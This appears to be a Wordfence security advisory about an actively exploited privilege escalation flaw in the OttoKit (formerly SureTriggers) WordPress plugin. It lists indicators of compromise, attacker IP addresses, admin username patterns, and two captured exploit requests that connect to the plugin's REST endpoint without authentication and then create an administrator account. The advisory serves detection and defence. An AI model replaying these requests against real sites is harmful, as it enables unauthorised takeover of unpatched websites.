Recently Disclosed SureTriggers Critical Privilege Escalation Vulnerability Under Active Exploitation

On May 2nd, 2025 the Wordfence Threat Intelligence team added a new critical vulnerability to the Wordfence Intelligence vulnerability database in the OttoKit: All-in-One Automation Platform (Formerly SureTriggers) plugin publicly disclosed by a third-party CNA on April 30th, 2025. This vulnerability makes it possible for unauthenticated attackers to gain administrative level access to vulnerable sites, where the site has never used an application password nor connected to SureTriggers or by authenticated attackers with a valid application password.

Special props to Denver Jackson for discovering and responsibly reporting this vulnerability.

Our records indicate that attackers may have started actively exploiting this vulnerability as early as May 2nd, 2025. We have at least one blocked request that appears malicious, with mass exploitation starting on May 4th, 2025. The Wordfence Firewall has already blocked over 2,400 exploit attempts targeting this vulnerability.

All Wordfence Premium, Wordfence Care, and Wordfence Response customers received a firewall rule to protect against any exploits targeting this vulnerability on May 2nd, 2025. Sites using the free version of Wordfence will receive the same protection 30 days later on June 1st, 2025.

The developer of OttoKit: All-in-One Automation Platform (Formerly SureTriggers) worked with the WordPress.org team to perform a forced update so the majority of sites should already be running the patched version of the plugin, 1.0.83. Please take this time to immediately verify that your site is running the latest patched version and update it without delay if it is not, as this vulnerability is under active exploitation.

The Vulnerability Details

The OttoKit: All-in-One Automation Platform (Formerly SureTriggers) plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.0.82. This is due to the create_wp_connection() function missing a capability check and insufficiently verifying a user’s authentication credentials. This makes it possible for unauthenticated attackers to establish a connection, which ultimately can make privilege escalation possible.

Additional Note: In our review, we found that this can only be exploited in two scenarios. The first is when a site has never enabled or used an application password, and SureTriggers has never been connected to the website before. This is due to the fact that a successful connection requires an application password, so anyone who has already connected to SureTriggers should already be protected from the unauthenticated attack scenario. In this case, an attacker should be able to successfully exploit this vulnerability without any knowledge of a valid username. The second exploitable scenario is when an attacker has authenticated access to a site and can generate a valid application password.

Indicators of Compromise

The following highlights the most common indicators of compromise. Currently, it appears that attackers are attempting to exploit the initial connection vulnerability to establish a connection with the site, and then subsequently use that to create an administrative user account through the automation/action endpoint.

It appears threat actors are doing this while also attempting to exploit CVE-2025-3102 leading us to believe that they are attempting both recently disclosed vulnerabilities to see if a site is vulnerable to either of the two exploits. It’s possible to distinguish exploits targeting CVE-2025-3102 as opposed to CVE-2025-27007 since an empty `St-Authorization` header will be present in exploit attempts targeting CVE-2025-3102.

Example Initial Request

 POST /wp-json/sure-triggers/v1/connection/create-wp-connection HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, br
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Host: [redacted]
Referer: www.google.com
User-Agent: OttoKit
Cache-Control: max-age=0
X-Forwarded-For: 144.91.119.115
Upgrade-Insecure-Requests: 1
Cf-Ray: 93ac255d5d18e98c-FRA
Cf-Visitor: {"scheme":"https"}
X-Forwarded-Proto: https
Cdn-Loop: cloudflare; loops=1
Cf-Connecting-Ip: 144.91.119.115
Cf-Ipcountry: FR
Content-Type: application/json
Content-Length: 17

{"sure-triggers-access-key": "[redacted]", "wp-password": "[redacted]", "connection_status": "ok", "wp-username": "wp_owsr", "connected_email": "[redacted]"}

Example Admin Creation Request

 POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, br
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Host: [redacted]
Referer: www.google.com
User-Agent: OttoKit
Cache-Control: max-age=0
X-Forwarded-For: 144.91.119.115
St-Authorization: [redacted]
Upgrade-Insecure-Requests: 1
Cf-Ray: 93ac25620c2ed36e-FRA
Cf-Visitor: {"scheme":"https"}
X-Forwarded-Proto: https
Cdn-Loop: cloudflare; loops=1
Cf-Connecting-Ip: 144.91.119.115
Cf-Ipcountry: FR
Content-Type: application/x-www-form-urlencoded
Content-Length: 243

selected_options[user_name]=wp_domc&selected_options[user_email]=[redacted]&selected_options[password]=[redacted]&selected_options[role]=administrator&integration=WordPress&type_event=create_user_if_not_exists

Top IPs Targeting CVE-2025-3102 and CVE-2025-27007

The following IP Addresses are the current most actively engaged IP addresses targeting the sure-triggers/v1/connection/create-wp-connection endpoint.

• 41.216.188.205
  • Over 870 blocked requests.
•  144.91.119.115
  • Over 690 blocked requests.
• 194.87.29.57
  • Over 500 blocked requests.
• 2a0b:4141:820:1f4::2
  • Over 200 blocked requests.
• 196.251.69.118
  • Over 25 blocked requests.
  • Interestingly, we have also logged over 731,000 requests from this IP probing for ‘/wp-content/plugins/suretriggers/readme.txt’ indicating that this might be a recon IP.

The following IP Addresses are the current most actively engaged IP addresses targeting the wp-json/sure-triggers/v1/automation/action endpoint, which indicates exploitation of both CVE-2025-3102 and CVE-2025-27007:

• 107.189.29.12
  • Over 139,000 blocked requests.
• 205.185.123.102
  • Over 118,000 blocked requests.
• 198.98.51.24
  • Over 105,000 blocked requests.
• 198.98.52.226
  • Over 64,000 blocked requests.
• 199.195.248.147
  • Over 56,000 blocked requests.

Administrative User Accounts

Keep an eye out for administrative user accounts created with the following username structures.

• Attacks originating from the IPs using 144.91.119.115, 41.216.188.205, and 196.251.69.118 are attempting to create administrator accounts with the username format ‘wp_’ suffixed with four random letters. This indicates that all IPs may belong to the same threat actor. Here are a few example variants:
  • wp_pfuq
  • wp_rvus
  • wp_uvge
• Attacks originating from the IPs 194.87.29.57 & 2a0b:4141:820:1f4::2 are attempting to create usernames with 12 characters like the following prefixed with `xtw18387`:
  • xtw18387e9db
  • xtw18387becc
  • xtw18387cc91
• Attacks originating from the IPs 107.189.29.12, 199.195.248.147, and 205.185.123.102 are attempting to create 14 character admin user names prefixed with `admin_` followed by random alphanumeric characters.
  • admin_iw0ag5sx
  • admin_o1etqaj6
  • admin_7h1vq7d7
• Attacks originating from the IPs 198.98.51.24 and 198.98.52.226 are attempting to create 13 character admin user names prefixed with `test_` followed by random alphanumeric characters.
  • test_iajt388i
  • test_z0vrl03m
  • test_24l6eap4

Access Log Traffic

The following REST API endpoints may have access requests in the logs.

• /wp-json/sure-triggers/v1/connection/create-wp-connection
• ?rest_route=sure-triggers/v1/connection/create-wp-connection

Following the successful exploitation of using the /connection/create-wp-connection endpoint, attackers are attempting to inject administrative user accounts by accessing the following endpoints. These endpoints are also an indication that attackers are targeting CVE-2025-3102.

• /wp-json/sure-triggers/v1/automation/action
• ?rest_route=sure-triggers/v1/automation/action

Conclusion

In today’s article, we covered the attack data for a critical-severity vulnerability in OttoKit: All-in-One Automation Platform (Formerly SureTriggers) that allows attackers to easily take over websites by establishing a connection with OttoKit: All-in-One Automation Platform (Formerly SureTriggers) and then creating an administrative user account. Our threat intelligence indicates that attackers may have started actively targeting this vulnerability as early as May 2nd, 2025 with mass exploitation starting on May 4th, 2025. The Wordfence firewall has already blocked over 2,400 exploit attempts targeting this vulnerability.

All Wordfence Premium, Wordfence Care, and Wordfence Response customers received a firewall rule to protect against any exploits targeting this vulnerability on May 2nd, 2025. Sites using the free version of Wordfence will receive the same protection 30 days later on June 1st, 2025.

The developer of OttoKit: All-in-One Automation Platform (Formerly SureTriggers) worked with the WordPress.org team to perform a forced update so most sites should be running the patched version of the plugin, 1.0.83. Regardless, we strongly recommend verifying that your site is running the latest patched version, or take action immediately to update.

If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.

The post Recently Disclosed SureTriggers Critical Privilege Escalation Vulnerability Under Active Exploitation appeared first on Wordfence.